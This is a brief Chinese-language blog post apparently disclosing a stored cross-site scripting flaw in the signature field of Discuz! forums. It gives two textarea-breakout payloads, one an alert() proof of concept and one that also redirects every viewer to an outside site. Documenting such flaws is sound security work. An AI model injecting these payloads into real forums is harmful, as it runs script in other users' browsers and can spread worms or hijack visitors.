Discuz!个性签名跨站漏洞
国内很多论坛都用的Discuz! 大家对dz的研究更多了Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测,在 Discuz! 及 img 代码禁用的情况下仍可写入恶意代码,Discuz! 会保存并执行该代码,形成永久型跨站。该漏洞可能导致蠕虫病毒的传播。
虽便选个 Discuz! 论坛我们注册一个用户!
并输入跨站脚本代码 , 以我们个人的签名!
代码:
</textarea><script>alert(/stuhack/);</script><textarea>
也可以写成这样:</textarea><script>alert(/注册成功/);location.href=/http://www.stuhack.com/;</script><textarea>
上一篇: 很好很强大的站长必备工具-监控宝
下一篇: 1000个开心的理由 No.2
